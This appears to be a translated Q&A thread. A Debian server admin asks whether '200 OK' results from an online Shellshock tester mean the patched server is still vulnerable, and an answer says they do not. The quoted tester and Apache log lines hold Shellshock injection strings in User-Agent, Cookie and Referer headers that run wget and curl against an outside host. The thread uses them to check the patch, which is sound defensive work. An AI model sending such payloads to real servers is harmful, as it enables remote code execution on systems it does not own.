我已经修复了Debian 6服务器上的shellshock错误,并在http://shellshock.brandonpotter.com/上进行了testing。我得到了“没有find漏洞”,这没关系,但是他们还检查了其他事情,并在testing日志中得到:
URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; wget)... 200 OK URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; curl)... 200 OK URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; /usr/local/bin/wget)... 200 OK URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { :;}; /usr/bin/wget)... 200 OK URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c 'wget)... 200 OK URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c 'curl)... 200 OK URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c '/usr/local/bin/wget)... 200 OK URL mydomain.net (Root URL) (Header User-Agent exploit attempted with () { (a)=>' bash -c '/usr/bin/wget)... 200 OK URL mydomain.net (Root URL) (Header Cookie exploit attempted with () { :;}; wget)... 200 OK URL mydomain.net (Root URL) (Header Cookie exploit attempted with () { :;}; curl)... 200 OK URL mydomain.net (Root URL) (Header Cookie exploit attempted with () { :;}; /usr/local/bin/wget)... 200 OK ... ... ... “200 OK”好吗? 200意味着可以接受。 我检查了几个其他的领域,其中一些也显示“200 OK”,但其他显示“错误”。
它能保持这样或我应该解决这个问题吗? 如果是,我该怎么做?
我在我的网站上查过这个,你不用担心。
这个网站在/上做了一些testing,他们没有调用特定的cgi脚本。 无论通过的引用者或用户代理试图利用这个结果,结果都是200 OK。
这是我的apache日志显示的一个例子:
75.127.84.182 - - [22/Oct/2014:11:52:54 +0200] "GET / HTTP/1.1" 200 5883 "() { (a)=>' bash -c 'wget http://shellshock.brandonpotter.com/report/TY7LR3VRD4E13X2XQXRUWV/Referer-bash-c-wget'" "-" 75.127.84.182 - - [22/Oct/2014:11:52:55 +0200] "GET / HTTP/1.1" 200 5883 "() { (a)=>' bash -c 'curl http://shellshock.brandonpotter.com/report/TY7LR3VRD4E13X2XQXRUWV/Referer-bash-c-curl'" "-"